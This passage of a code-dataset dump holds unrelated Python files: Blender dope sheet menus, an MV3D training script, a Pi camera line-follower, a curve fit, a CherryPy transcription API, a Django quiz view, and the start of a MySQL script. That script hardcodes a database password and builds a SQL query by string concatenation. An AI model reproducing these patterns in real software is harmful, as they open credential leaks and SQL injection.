text=\"\", icon_only=True)\n\n\nclass DOPESHEET_MT_editor_menus(Menu):\n bl_idname = 
\"DOPESHEET_MT_editor_menus\"\n bl_label = \"\"\n\n def draw(self, context):\n layout = self.layout\n st = context.space_data\n\n layout.menu(\"DOPESHEET_MT_view\")\n layout.menu(\"DOPESHEET_MT_select\")\n layout.menu(\"DOPESHEET_MT_marker\")\n\n if st.mode == 'DOPESHEET' or (st.mode == 'ACTION' and st.action is not None):\n layout.menu(\"DOPESHEET_MT_channel\")\n elif st.mode == 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_gpencil_channel\")\n\n if st.mode != 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_key\")\n else:\n layout.menu(\"DOPESHEET_MT_gpencil_frame\")\n\n\nclass DOPESHEET_MT_view(Menu):\n bl_label = \"View\"\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n layout.operator(\"action.properties\", icon='MENU_PANEL')\n layout.separator()\n\n layout.prop(st.dopesheet, \"use_multi_word_filter\", text=\"Multi-word Match Search\")\n\n layout.separator()\n\n layout.prop(st, \"use_realtime_update\")\n layout.prop(st, \"show_frame_indicator\")\n layout.prop(st, \"show_sliders\")\n layout.prop(st, \"show_group_colors\")\n layout.prop(st, \"show_interpolation\")\n layout.prop(st, \"show_extremes\")\n layout.prop(st, \"use_auto_merge_keyframes\")\n\n layout.prop(st, \"show_seconds\")\n layout.prop(st, \"show_locked_time\")\n\n layout.separator()\n layout.operator(\"anim.previewrange_set\")\n layout.operator(\"anim.previewrange_clear\")\n layout.operator(\"action.previewrange_set\")\n\n layout.separator()\n layout.operator(\"action.view_all\")\n layout.operator(\"action.view_selected\")\n layout.operator(\"action.view_frame\")\n\n # Add this to show key-binding (reverse action in dope-sheet).\n layout.separator()\n props = layout.operator(\"wm.context_set_enum\", text=\"Toggle Graph Editor\", icon=\"GRAPH\")\n props.data_path = \"area.type\"\n props.value = 'GRAPH_EDITOR'\n\n layout.separator()\n layout.menu(\"INFO_MT_area\")\n\n\nclass DOPESHEET_MT_select(Menu):\n bl_label = \"Select\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.select_all\", text=\"All\").action = 'SELECT'\n layout.operator(\"action.select_all\", text=\"None\").action = 'DESELECT'\n layout.operator(\"action.select_all\", text=\"Invert\").action = 'INVERT'\n\n layout.separator()\n layout.operator(\"action.select_box\").axis_range = False\n layout.operator(\"action.select_box\", text=\"Border Axis Range\").axis_range = True\n\n layout.operator(\"action.select_circle\")\n\n layout.separator()\n layout.operator(\"action.select_column\", text=\"Columns on Selected Keys\").mode = 'KEYS'\n layout.operator(\"action.select_column\", text=\"Column on Current Frame\").mode = 'CFRA'\n\n layout.operator(\"action.select_column\", text=\"Columns on Selected Markers\").mode = 'MARKERS_COLUMN'\n layout.operator(\"action.select_column\", text=\"Between Selected Markers\").mode = 'MARKERS_BETWEEN'\n\n layout.separator()\n props = layout.operator(\"action.select_leftright\", text=\"Before Current Frame\")\n props.extend = False\n props.mode = 'LEFT'\n props = layout.operator(\"action.select_leftright\", text=\"After Current Frame\")\n props.extend = False\n props.mode = 'RIGHT'\n\n # FIXME: grease pencil mode isn't supported for these yet, so skip for that mode only\n if context.space_data.mode != 'GPENCIL':\n layout.separator()\n layout.operator(\"action.select_more\")\n layout.operator(\"action.select_less\")\n\n layout.separator()\n layout.operator(\"action.select_linked\")\n\n\nclass DOPESHEET_MT_marker(Menu):\n bl_label = \"Marker\"\n\n def draw(self, context):\n layout = 
self.layout\n\n from .space_time import marker_menu_generic\n marker_menu_generic(layout)\n\n st = context.space_data\n\n if st.mode in {'ACTION', 'SHAPEKEY'} and st.action:\n layout.separator()\n layout.prop(st, \"show_pose_markers\")\n\n if st.show_pose_markers is False:\n layout.operator(\"action.markers_make_local\")\n\n layout.prop(st, \"use_marker_sync\")\n\n#######################################\n# Keyframe Editing\n\n\nclass DOPESHEET_MT_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_setting_toggle\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_enable\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_disable\", \"type\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n layout.operator(\"anim.channels_fcurves_enable\")\n\n\nclass DOPESHEET_MT_key(Menu):\n bl_label = \"Key\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.keyframe_insert\")\n\n layout.separator()\n layout.operator(\"action.frame_jump\")\n\n layout.separator()\n layout.operator(\"action.copy\")\n layout.operator(\"action.paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator_menu_enum(\"action.keyframe_type\", \"type\", text=\"Keyframe Type\")\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n\n layout.separator()\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n layout.operator(\"action.sample\")\n\n\nclass DOPESHEET_MT_key_transform(Menu):\n bl_label = \"Transform\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"transform.transform\", text=\"Move\").mode = 'TIME_TRANSLATE'\n layout.operator(\"transform.transform\", text=\"Extend\").mode = 'TIME_EXTEND'\n layout.operator(\"transform.transform\", text=\"Slide\").mode = 'TIME_SLIDE'\n layout.operator(\"transform.transform\", text=\"Scale\").mode = 'TIME_SCALE'\n\n\n#######################################\n# Grease Pencil Editing\n\nclass DOPESHEET_MT_gpencil_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_setting_toggle\")\n layout.operator(\"anim.channels_setting_enable\")\n 
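# Each operator() call here adds one row to the Channel menu; unlike\n        # DOPESHEET_MT_channel above, this grease-pencil variant exposes the plain\n        # operators rather than their operator_menu_enum versions.\n        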
layout.operator(\"anim.channels_setting_disable\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n\n # XXX: to be enabled when these are ready for use!\n # layout.separator()\n # layout.operator(\"anim.channels_expand\")\n # layout.operator(\"anim.channels_collapse\")\n\n # layout.separator()\n #layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n\nclass DOPESHEET_MT_gpencil_frame(Menu):\n bl_label = \"Frame\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.duplicate\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator(\"action.keyframe_type\")\n\n # layout.separator()\n # layout.operator(\"action.copy\")\n # layout.operator(\"action.paste\")\n\n\nclass DOPESHEET_MT_delete(Menu):\n bl_label = \"Delete\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n\n\nclass DOPESHEET_MT_specials(Menu):\n bl_label = \"Dope Sheet Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.copy\", text=\"Copy\")\n layout.operator(\"action.paste\", text=\"Paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n layout.operator_menu_enum(\"action.easing_type\", \"type\", text=\"Easing Type\")\n\n layout.separator()\n\n layout.operator(\"action.keyframe_insert\").type = 'SEL'\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n\n\nclass DOPESHEET_MT_channel_specials(Menu):\n bl_label = \"Dope Sheet Channel Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"anim.channels_setting_enable\", text=\"Mute Channels\").type = 'MUTE'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unmute Channels\").type = 'MUTE'\n layout.separator()\n layout.operator(\"anim.channels_setting_enable\", text=\"Protect Channels\").type = 'PROTECT'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unprotect Channels\").type = 'PROTECT'\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n\n layout.operator(\"anim.channels_delete\")\n\n\nclass DOPESHEET_MT_snap_pie(Menu):\n bl_label = \"Snap\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n\n pie.operator(\"action.snap\", 
text=\"Current Frame\").type = 'CFRA'\n pie.operator(\"action.snap\", text=\"Nearest Frame\").type = 'NEAREST_FRAME'\n pie.operator(\"action.snap\", text=\"Nearest Second\").type = 'NEAREST_SECOND'\n pie.operator(\"action.snap\", text=\"Nearest Marker\").type = 'NEAREST_MARKER'\n\n\nclasses = (\n DOPESHEET_HT_header,\n DOPESHEET_HT_editor_buttons,\n DOPESHEET_MT_editor_menus,\n DOPESHEET_MT_view,\n DOPESHEET_MT_select,\n DOPESHEET_MT_marker,\n DOPESHEET_MT_channel,\n DOPESHEET_MT_key,\n DOPESHEET_MT_key_transform,\n DOPESHEET_MT_gpencil_channel,\n DOPESHEET_MT_gpencil_frame,\n DOPESHEET_MT_delete,\n DOPESHEET_MT_specials,\n DOPESHEET_MT_channel_specials,\n DOPESHEET_MT_snap_pie,\n DOPESHEET_PT_filters,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n", "sub_path": "engine/2.80/scripts/startup/bl_ui/space_dopesheet.py", "file_name": "space_dopesheet.py", "file_ext": "py", "file_size_in_byte": 23059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "bpy.data", "line_number": 48, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 120, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 122, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 124, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 126, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 128, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 130, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 132, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 134, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 139, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 141, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 143, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 145, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 147, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 149, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 151, "usage_type": "attribute"}, {"api_name": "bpy.types.Panel", "line_number": 176, "usage_type": "name"}, {"api_name": "bpy.types.Header", "line_number": 205, "usage_type": "name"}, {"api_name": "space_time.TIME_MT_editor_menus.draw_collapsible", "line_number": 221, "usage_type": "call"}, {"api_name": "space_time.TIME_MT_editor_menus", "line_number": 221, "usage_type": "name"}, {"api_name": "space_time.TIME_HT_editor_buttons.draw_header", "line_number": 222, "usage_type": "call"}, {"api_name": "space_time.TIME_HT_editor_buttons", "line_number": 222, "usage_type": "name"}, {"api_name": "bpy.types.Header", "line_number": 231, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 296, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 319, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 365, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 406, "usage_type": "name"}, {"api_name": "space_time.marker_menu_generic", "line_number": 413, "usage_type": "call"}, {"api_name": "bpy.types.Menu", "line_number": 430, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 464, "usage_type": "name"}, {"api_name": "bpy.types.Menu", 
"line_number": 499, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 514, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 541, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 563, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 577, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 605, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 637, "usage_type": "name"}, {"api_name": "bpy.utils.register_class", "line_number": 672, "usage_type": "call"}]} {"seq_id": "644720849", "text": "import mv3d\nimport mv3d_net\nimport glob\nfrom config import *\nimport utils.batch_loading as ub\nimport argparse\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='training')\n\n all= '%s,%s,%s' % (mv3d_net.top_view_rpn_name ,mv3d_net.imfeature_net_name,mv3d_net.fusion_net_name)\n\n parser.add_argument('-w', '--weights', type=str, nargs='?', default='',\n help='use pre trained weigthts example: -w \"%s\" ' % (all))\n\n parser.add_argument('-t', '--targets', type=str, nargs='?', default=all,\n help='train targets example: -w \"%s\" ' % (all))\n\n parser.add_argument('-i', '--max_iter', type=int, nargs='?', default=1000,\n help='max count of train iter')\n\n parser.add_argument('-n', '--tag', type=str, nargs='?', default='unknown_tag',\n help='set log tag')\n\n parser.add_argument('-c', '--continue_train', type=bool, nargs='?', default=False,\n help='set continue train flag')\n args = parser.parse_args()\n\n print('\\n\\n{}\\n\\n'.format(args))\n tag = args.tag\n if tag == 'unknown_tag':\n tag = input('Enter log tag : ')\n print('\\nSet log tag :\"%s\" ok !!\\n' %tag)\n\n max_iter = args.max_iter\n weights=[]\n if args.weights != '':\n weights = args.weights.split(',')\n\n targets=[]\n if args.targets != '':\n targets = args.targets.split(',')\n\n dataset_dir = cfg.PREPROCESSED_DATA_SETS_DIR\n\n if cfg.DATA_SETS_TYPE == 'didi' or cfg.DATA_SETS_TYPE == 'test':\n training_dataset = {\n '1': ['6_f', '9_f', '10', '13', '20', '21_f', '15', '19'],\n '2': ['3_f', '6_f', '8_f'],\n '3': ['2_f', '4', '6', '8', '7', '11_f']}\n\n validation_dataset = {\n '1': ['15']}\n\n elif cfg.DATA_SETS_TYPE == 'kitti':\n training_dataset = {\n '2011_09_26': ['0001', '0017', '0029', '0052', '0070', '0002', '0018', '0056', '0019',\n '0036', '0005',\n '0057', '0084', '0020', '0039', '0086', '0011', '0023', '0046', '0060', '0091']}\n\n validation_dataset = {\n '2011_09_26': ['0013', '0027', '0048',\n '0061', '0015', '0028', '0051', '0064']\n }\n\n training = ub.batch_loading(dataset_dir, training_dataset)\n\n validation = ub.batch_loading(dataset_dir, validation_dataset)\n\n train = mv3d.Trainer(train_set=training, validation_set=validation,\n pre_trained_weights=weights, train_targets=targets, log_tag=tag,\n continue_train = args.continue_train)\n\n train(max_iter=max_iter)\n\n\n", "sub_path": "experiments/archive/exp_002_round1_version_fusion_net_test_num1/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2633, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "mv3d_net.top_view_rpn_name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mv3d_net.imfeature_net_name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mv3d_net.fusion_net_name", "line_number": 13, "usage_type": "attribute"}, 
{"api_name": "utils.batch_loading.batch_loading", "line_number": 68, "usage_type": "call"}, {"api_name": "utils.batch_loading", "line_number": 68, "usage_type": "name"}, {"api_name": "utils.batch_loading.batch_loading", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.batch_loading", "line_number": 70, "usage_type": "name"}, {"api_name": "mv3d.Trainer", "line_number": 72, "usage_type": "call"}]} {"seq_id": "326703440", "text": "# import the necessary packages\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom movement import LineFollow\nimport time\nimport cv2\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\nw, h = 320, 240\ncamera.resolution = (w, h) # (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=camera.resolution)\n\n\npath_follow = LineFollow() # get movement directions from this class\n\n# allow the camera to warmup\ntime.sleep(0.1)\n\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n image = frame.array\n # get frame size\n w, h = image.shape[:2]\n # use the lower center of the image\n x, y = w//5, h//2\n image = image[y:y + h//4, x:x + 3*w//5]\n\n # do one loop\n path_follow.pi_cam_loop(image)\n # move\n path_follow.perform_movement()\n # path_follow.zero_motors()\n\n key = cv2.waitKey(1) & 0xFF\n # clear the stream in preparation for the next frame\n rawCapture.truncate(0)\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\") or path_follow.end:\n path_follow.zero_motors()\n break", "sub_path": "face_follow.py", "file_name": "face_follow.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "picamera.PiCamera", "line_number": 9, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 13, "usage_type": "call"}, {"api_name": "movement.LineFollow", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 38, "usage_type": "call"}]} {"seq_id": "542639204", "text": "# coding:utf-8\r\n\r\nimport numpy as np\r\nfrom scipy.optimize import leastsq\r\n\r\n# \r\n# take init as initial \r\n#\r\n\r\ndef func(init):\r\n a, b = init\r\n return(y - (a * x + b))\r\n\r\ndef predict(a, b, x):\r\n return a * x + b\r\n\r\nif __name__ =='__main__':\r\n\r\n x = np.array([373.15, 473.15, 573.15, 673.15, 773.15, 873.15])\r\n y = np.array([2.573, 5.376, 8.431, 11.72, 15.29, 19.33])\r\n\r\n# get a and b parameter \r\n\r\n a, b = leastsq(func, [1,2])[0]\r\n\r\n# generate x output\r\n\r\n print(\"The simulation function is ΔH =\", a, \"* T\", b)\r\n print(\"Predicted ΔH of 350℃ is\", predict(a, b, 623.15))\r\n\r\n#\r\n# Arthor: Jiongchi Yu\r\n# Date: 2020.4.11\r\n# \r\n", "sub_path": "homework/3/T3_5.py", "file_name": "T3_5.py", "file_ext": "py", "file_size_in_byte": 648, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.optimize.leastsq", "line_number": 24, "usage_type": "call"}]} {"seq_id": "13741303", "text": "__author__ = 'sevag'\n\nfrom 
def _generate_random_string(length=_random_string_length):\n    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))\n\n\ndef _transcribe(identifier, youtube_url=None, file=None):\n    global _results\n    try:\n        iterator = Iterator(_millis_chunk).for_media(identifier, youtube_url=youtube_url, file=file)\n        title, pitch_dict = iterator.get_pitch_dict()\n        plot_buf = plot_from_dict(title, pitch_dict)\n        _results[identifier] = plot_buf\n        return identifier\n    except Exception as e:\n        _results[identifier] = 'error'\n        error = str(e)\n        return identifier, error\n\n\nclass TranscribeAPI(object):\n    exposed = True\n\n    def __init__(self, callback=None):\n        self.pool = Pool(processes=_num_processes)\n        self.tempdir = TemporaryDirectory()\n        self.callback = callback\n\n    def POST(self, youtube_url=None, file=None):\n        identifier = _generate_random_string().encode('utf-8')\n        if file:\n            f = open(self.tempdir.name + '/' + file.filename, mode='wb')\n            f.write(file.file.read())\n            f.close()\n            file = f.name\n        self.pool.starmap_async(_transcribe, [(identifier, youtube_url, file)], callback=self.callback)\n        cherrypy.response.headers['Content-Type'] = \"text/plain\"\n        return identifier\n\n    def GET(self, identifier):\n        if identifier:\n            if isinstance(identifier, str):\n                identifier = identifier.encode('utf-8')\n            try:\n                result = _results[identifier]\n                if result == 'error':\n                    raise cherrypy.HTTPError(status=500)\n            except Exception as e:\n                _logger.error('failed to fetch result for %s: %s', identifier, e)\n                if isinstance(e, KeyError):\n                    raise cherrypy.HTTPError(status=404)\n                else:\n                    raise cherrypy.HTTPError(status=500)\n            cherrypy.response.headers['Content-Type'] = \"image/png\"\n            pub.sendMessage('itemDelTopic', identifier=identifier, name=_results[identifier])\n            return file_generator(result)\n        else:\n            raise cherrypy.HTTPError(status=400)\n", "sub_path": "transcriber/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 2852, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "multiprocessing.Manager", "line_number": 13, "usage_type": "call"}, {"api_name": "config.get_config_setting", "line_number": 14, "usage_type": "call"}, {"api_name": "config.get_config_setting", "line_number": 15, "usage_type": "call"}, {"api_name": "config.get_config_setting", "line_number": 16, "usage_type": "call"}, {"api_name": "cleanup.Cleanup", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 22, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 22, "usage_type": "attribute"}, {"api_name": "iterator.Iterator", "line_number": 28, "usage_type": "call"}, {"api_name": "iterator.get_pitch_dict", "line_number": 29, 
"usage_type": "call"}, {"api_name": "output.plot_from_dict", "line_number": 30, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 43, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 44, "usage_type": "call"}, {"api_name": "cherrypy.response", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cherrypy.HTTPError", "line_number": 65, "usage_type": "call"}, {"api_name": "cherrypy.HTTPError", "line_number": 69, "usage_type": "call"}, {"api_name": "cherrypy.HTTPError", "line_number": 71, "usage_type": "call"}, {"api_name": "cherrypy.response", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pubsub.pub.sendMessage", "line_number": 73, "usage_type": "call"}, {"api_name": "pubsub.pub", "line_number": 73, "usage_type": "name"}, {"api_name": "cherrypy.lib.file_generator", "line_number": 74, "usage_type": "call"}, {"api_name": "cherrypy.HTTPError", "line_number": 76, "usage_type": "call"}]} {"seq_id": "446935822", "text": "# -*- coding: utf-8 -*-\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom main import settings\nfrom main.forms import TaskForm\nfrom main.models import Task, CheatSheet\n\n\ndef task_set_quiz(request):\n task_ids = [str(task.id) for task in Task.objects.all()]\n if not task_ids:\n raise Http404\n request.session['task_ids'] = ' '.join(task_ids)\n request.session['task_index'] = 0\n request.session['quiz_score'] = 0\n request.session['keyboard'] = settings.SCREEN_KEYBOARDS[0][0]\n return redirect('main:task_solve')\n\n\ndef task_solve(request):\n if 'task_ids' not in request.session:\n return redirect('main:task_set_quiz')\n task_ids = request.session['task_ids'].split()\n task_index = request.session['task_index']\n if task_index >= len(task_ids):\n quiz_score = request.session['quiz_score']\n messages.add_message(request, messages.INFO, u'Ispravno ste riješili %d od ukupno %d zadataka.' % (quiz_score, len(task_ids)))\n return redirect('main:task_set_quiz')\n task_id = task_ids[task_index]\n\n if 'skip' in request.GET:\n request.session['task_index'] = task_index + 1\n return redirect('main:task_solve')\n\n if 'keyboard' in request.POST:\n request.session['keyboard'] = request.POST['keyboard']\n\n task = get_object_or_404(Task, id=task_id)\n form = TaskForm(data=request.POST or None, task=task)\n\n if form.is_valid():\n request.session['task_index'] = task_index + 1\n request.session['quiz_score'] = request.session['quiz_score'] + 1\n messages.add_message(request, messages.SUCCESS, u'Ispravno ste riješili %d. 
zadatak, *%s = \"%s\"' % (task.number, task.answer, task.translation))\n        return redirect('main:task_solve')\n\n    sheets = CheatSheet.objects.all()\n    return render(request, 'main/task.html', {\n        'task': task,\n        'form': form,\n        'sheets': sheets,\n        'keyboards': settings.SCREEN_KEYBOARDS,\n        'keyboard': request.session['keyboard'],\n    })\n", "sub_path": "main/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "main.models.Task.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "main.models.Task.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "main.models.Task", "line_number": 11, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 13, "usage_type": "name"}, {"api_name": "main.settings.SCREEN_KEYBOARDS", "line_number": 17, "usage_type": "attribute"}, {"api_name": "main.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.messages.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 39, "usage_type": "call"}, {"api_name": "main.models.Task", "line_number": 39, "usage_type": "argument"}, {"api_name": "main.forms.TaskForm", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "main.models.CheatSheet.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "main.models.CheatSheet.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "main.models.CheatSheet", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}, {"api_name": "main.settings.SCREEN_KEYBOARDS", "line_number": 53, "usage_type": "attribute"}, {"api_name": "main.settings", "line_number": 53, "usage_type": "name"}]} {"seq_id": "373240034", "text": "import os\r\nimport time\r\nimport datetime\r\nimport mysql.connector\r\n####################### Is dead check script ###################\r\n\r\n## Define variables\r\ngame=open(\"game\",\"r\").read()\r\nusername=open(\"username\",\"r\").read()\r\nfaction=open(\"faction\",\"r\").read()\r\nip=open(\"ip.txt\",\"r\").read().rstrip('\\n')\r\n\r\n################################################################\r\ntry:\r\n    cnx = mysql.connector.connect(user='default', password='P@sSWORD',\r\n                                  host=ip,\r\n                                  database=game)\r\nexcept mysql.connector.Error:\r\n    input(\"ERROR: Connection Failed\")\r\n    quit()\r\ndef isdead(username):\r\n    curdate=datetime.datetime.today().strftime(\"%m%d%Y\")\r\n    cursor=cnx.cursor()\r\n    print(\"Checking if user is considered dead...\")\r\n    
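# (Illustrative note, not in the original script:) string-concatenated SQL like\r\n    # the line below is injection-prone; an equivalent parameterized form would be:\r\n    #   cursor.execute(\"SELECT * FROM deadlist WHERE username=%s\", (username,))\r\n    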
